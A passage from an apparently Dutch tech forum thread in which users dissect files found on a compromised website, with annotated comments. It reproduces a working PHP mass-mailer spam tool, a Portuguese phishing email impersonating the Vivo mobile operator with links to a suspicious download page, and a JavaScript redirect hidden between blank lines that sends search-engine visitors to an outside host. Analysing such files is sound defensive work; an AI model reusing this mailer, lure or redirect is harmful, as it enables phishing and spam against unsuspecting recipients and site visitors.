<td><div align="center"><font color="#4A0000"><b><font size="2" face="tahoma, Arial, Helvetica, sans-serif">MSG:</font></b></font></div></td>
<td bgcolor="#999999"> </td>
<td><textarea name="html" cols="30" rows="4" id="<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>

<body>

<div id="MessageBodyAll" style="display: block">
<div class="MessageBody">
<br>
 <div class="ExternalClass" id="MessageBodyText">
<div align="center">
<table width="10%" border="0">
<tr>
<td><a href="http://www.psybaladas.com/vivo.php?vivo=Foto11072007.jpg">
<img src="http://k-addiction.de/css/imagen1.jpg" width="585" height="195"></a></td>
</tr>
<tr>
<td>
<div align="center">
<strong>
<font face="Verdana, Arial, Helvetica, sans-serif" color="#000000" size="2">
Vivo torpedo foi enviado de um celular para seu e-mail, do numero
****9831 .</font></strong><p><strong>
<a href="http://www.psybaladas.com/vivo.php?vivo=Foto11072007.jpg"><img src="http://k-addiction.de/css/imagen2.jpg" width="579" height="94"></strong></p>
<p><strong>
<font face="Verdana, Arial, Helvetica, sans-serif" size="2">
<a href="http://www.psybaladas.com/vivo.php?vivo=Foto11072007.jpg">Veja aqui seu Vivo Foto Torpedo</a></font></strong></p>
<p> </p>
<p><font face="Verdana, Arial, Helvetica, sans-serif" size="2">
<strong>Vivo agora do seu celular para seu e-mail.</strong></font></p>
<p> </p>
<p><strong>
<font face="Verdana, Arial, Helvetica, sans-serif" size="2">
<img src="http://www.vivo.com.br/_sys/_img_homenova/logo_footer_006699.gif" width="186" height="58"></font></strong></p>
<p><font face="Verdana, Arial, Helvetica, sans-serif" size="1">Uma
empresa Portugal Telecom e Telefonica - Copyright Vivo 2007<br>
Vivo sinal de qualidade</font></div>


<table border="0" cellspacing="2" cellpadding="0">
</table></textarea></td>
</tr>
<tr>
<td><div align="center"><font color="#4A0000"><b><font size="2" face="tahoma, Arial, Helvetica, sans-serif">MAILS:</font></b></font></div></td>

<td bgcolor="#999999"> </td>
<td><textarea name="lista" cols="40" rows="10" id="textarea3">derflnx@hotmail.com</textarea></td>
</tr>
<tr>
<td><div align="center"></div></td>
<td bgcolor="#999999"> </td>
<td> </td>
</tr>
<tr>
<td> </td>

<td bgcolor="#999999"> </td>
<td><div align="center">
<input name="manda" type="submit" id="manda" value="SPAM!">
</div></td>
</tr>
<tr>
<td height="23"> </td>
<td bgcolor="#999999"> </td>
<td><div align="center"><font size="2" face="tahoma, Arial, Helvetica, sans-serif">Informações:
<a href="mailto:support@Hotmail.com">31337</a></font></div></td>

</tr>
</table></td>
</tr>
</table>

Check.js tenslotte heb ik hier ook nog. Het beging met 100 witregels. op regel 101 staat vanaf het ongeveer 75e karakter de vologende code gevolgd door weer 100 witregels :

if ( (Math.random()*60 < JSS1) && document.referrer.match(/^http:\/\/([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\./) && document.referrer.match(/[?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=/) && !document.referrer.match(/[?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=[^&]+(%3A|%22)/) ){ location.href=JSS3+'?r='+encodeURIComponent(document.referrer)+'&s='+JSS2; };

Misschien helpt dit jullie verder ?

donderdag 22 mei 2008 09:04

Acties:
  • lordgandalf
  • Registratie: Februari 2002
  • Laatst online: 25-11 15:05

lordgandalf

ik zal er zo eens mee gaan spelen maar lijkt een beetje op een phising site van hotmail ofzo als ik het zo snel zie maar zal zo even verder in de code duiken

//edit

JavaScript:
1
2
3
4

if ( (Math.random()*60 < JSS1) &&  //als random * 60 niet gelijk is aan JSS1 en
document.referrer.match(/^http:\/\/([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\./) && //de referrer is een van de bovenstaande bedrijven 
document.referrer.match(/[?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=/) && //en is een zoek machine
!document.referrer.match(/[?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=[^&]+(%3A|%22)/) ){ location.href=JSS3+'?r='+encodeURIComponent(document.referrer)+'&s='+JSS2; }; //en is geen zoekmachine dan stuur naar JSS3 met r als referrer en s als JSS2


PHP:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158

<title> inb0x H0tmAil.c0M </title>                  //html title
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">    //html body
<?php                                   //start php

set_time_limit(0);                          //geen tijd limiet voor uitvoer script

if($manda)                              //als er een variable bestaat met de naam $manda dan voer onderstaande code uit 
{
//EMAIL DO DESTINAT?RIO
$destinatario = "$remetente";                       //email ontvanger

//ASSUNTO DO EMAIL
$assunto = "$assunto";                          //email zender

//MENSAGEM DO EMAIL
$mensagem = $html;                          //html bericht
$mensagem = stripslashes($mensagem);                    //verwijder slashes
//CABE?ALHO DO EMAIL            
$headers = "MIME-Version: 1.0\r\n";                 //set mime version
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";      //set context type
/* headers adicionais */
$headers .= "From: $remetente>\r\n";                    //set from veld
$headers .= "Cc: $remetente\r\n";                   //set carbon copy veld
$headers .= "Bcc: e$remetente\r\n";                 //set blind carbon copy veld

//ARQUIVO COM OS EMAILS
$arquivo = $lista;                          //plaats de lijst $lista in de var $arquivo

//LENDO ARQUIVO
$file = explode("\n", $arquivo);                    //hak de lijst in stukjes met als split teken een newline
$i = 1;                                 //zet $i naar 1


?>                                  //beindig php
<p> </p>
<?                                  //start php
if($manda) { ?>                             //als de var $manda bestaat toon dat email is verstuurt
<table width="59%" height="30" border="0" align="center" cellpadding="2" cellspacing="1" bgcolor="#333333">
<tr>
<td bgcolor="#f5f5f5">
<?
foreach ($file as $mail) {                      //voor elke entry in $file als $mail

if(mail($mail, $assunto, $mensagem, $headers))              //stuur mail met bericht en headers

echo "<font color=red face=tahoma size=1>* $i - ".$mail."</font> <font color=red face=tahoma size=1>OK - Sended<b>
;</b></font><b><font color=pink face=tahoma size=1>)</font></b> <font color=red face=tahoma size=1> by
3133</font><b><font color=pink face=tahoma size=1>7</font></b><br>";    //als het geslaagd is toon OK - Sended by 31337

else                                    //anders

echo "* $i ".$email[$i]." <font color=yellow><b>NO</b> -        // toon het email nummer + email info + NO Não Presta joga fora! 

Não Presta joga fora!</font><br><hr>";

$i++;                                   //update $i


}
}
?>
</td>
</tr>
</table><? } ?>
<form name="form1" method="post" action="">
<table width="47%" height="202" border="0" align="center" cellpadding="0" cellspacing="2" bgcolor="#999999">
<tr>
<td bgcolor="#FFFFFF"><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="3" bgcolor="#FFFFFF"> <div align="center"> </div></td>

</tr>
<tr>                                    //zender
<td width="21%"><div align="center"><font color="#4A0000"><b><font size="2" face="tahoma, Arial, Helvetica, sans-serif">Assunto:</font></b></font></div></td>
<td width="1%" bgcolor="#999999"> </td>
<td width="78%"><input name="assunto" type="text" id="assunto3" value="VIVO foto torpedo." size="50"></td>
</tr>       
<tr>                                    //ontvangers
<td><div align="center"><font color="#4A0000"><b><font size="2" face="tahoma, Arial, Helvetica, sans-serif">Remetente:</font></b></font></div></td>
<td bgcolor="#999999"> </td>
                                    //stuur mail ook naar xxxx9831@torpedo.vivo.com.br
<td><input name="remetente" type="text" id="remetente3" value="<xxxx9831@torpedo.vivo.com.br" size="20"></td>
</tr>
<tr>
<td><div align="center"><font color="#4A0000"><b><font size="2" face="tahoma, Arial, Helvetica, sans-serif">MSG:</font></b></font></div></td>
<td bgcolor="#999999"> </td>                        //html inhoud van mail
<td><textarea name="html" cols="30" rows="4" id="<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>

<body>

<div id="MessageBodyAll" style="display: block">
<div class="MessageBody">
<br>
 <div class="ExternalClass" id="MessageBodyText">
<div align="center">
<table width="10%" border="0">
<tr>
<td><a href="http://www.psybaladas.com/vivo.php?vivo=Foto11072007.jpg">
<img src="http://k-addiction.de/css/imagen1.jpg" width="585" height="195"></a></td>
</tr>
<tr>
<td>
<div align="center">
<strong>
<font face="Verdana, Arial, Helvetica, sans-serif" color="#000000" size="2">
Vivo torpedo foi enviado de um celular para seu e-mail, do numero
****9831 .</font></strong><p><strong>
<a href="http://www.psybaladas.com/vivo.php?vivo=Foto11072007.jpg"><img src="http://k-addiction.de/css/imagen2.jpg" width="579" height="94"></strong></p>
<p><strong>
<font face="Verdana, Arial, Helvetica, sans-serif" size="2">
<a href="http://www.psybaladas.com/vivo.php?vivo=Foto11072007.jpg">Veja aqui seu Vivo Foto Torpedo</a></font></strong></p>
<p> </p>
<p><font face="Verdana, Arial, Helvetica, sans-serif" size="2">
<strong>Vivo agora do seu celular para seu e-mail.</strong></font></p>
<p> </p>
<p><strong>
<font face="Verdana, Arial, Helvetica, sans-serif" size="2">
<img src="http://www.vivo.com.br/_sys/_img_homenova/logo_footer_006699.gif" width="186" height="58"></font></strong></p>
<p><font face="Verdana, Arial, Helvetica, sans-serif" size="1">Uma
empresa Portugal Telecom e Telefonica - Copyright Vivo 2007<br>
Vivo sinal de qualidade</font></div>


<table border="0" cellspacing="2" cellpadding="0">
</table></textarea></td>
</tr>
<tr>                                        //lijst van te mailen mensen
<td><div align="center"><font color="#4A0000"><b><font size="2" face="tahoma, Arial, Helvetica, sans-serif">MAILS:</font></b></font></div></td>

<td bgcolor="#999999"> </td>
<td><textarea name="lista" cols="40" rows="10" id="textarea3">derflnx@hotmail.com</textarea></td>
</tr>
<tr>
<td><div align="center"></div></td>
<td bgcolor="#999999"> </td>
<td> </td>
</tr>
<tr>
<td> </td>

<td bgcolor="#999999"> </td>
<td><div align="center">                            //verstuur spam !!
<input name="manda" type="submit" id="manda" value="SPAM!">
</div></td>
</tr>
<tr>
<td height="23"> </td>
<td bgcolor="#999999"> </td>
<td><div align="center"><font size="2" face="tahoma, Arial, Helvetica, sans-serif">Informações:
<a href="mailto:support@Hotmail.com">31337</a></font></div></td>

</tr>
</table></td>
</tr>
</table>

[ Voor 95% gewijzigd door lordgandalf op 22-05-2008 09:34 ]

Steam: Profile / Socialclub: Profile / Uplay: minedwarf / Origin: lordgandalf3

Pagina: 1
Reageer

Apple iPhone 17 LG OLED evo G5 Google Pixel 10 Samsung Galaxy S25 Star Wars: Outlaws Nintendo Switch 2 Apple AirPods Pro (2e generatie) Sony PlayStation 5 Pro

Tweakers is onderdeel van DPG Media B.V.
Alle rechten voorbehouden - Auteursrecht © 1998 - 2025 Hosting door TrueFullstaq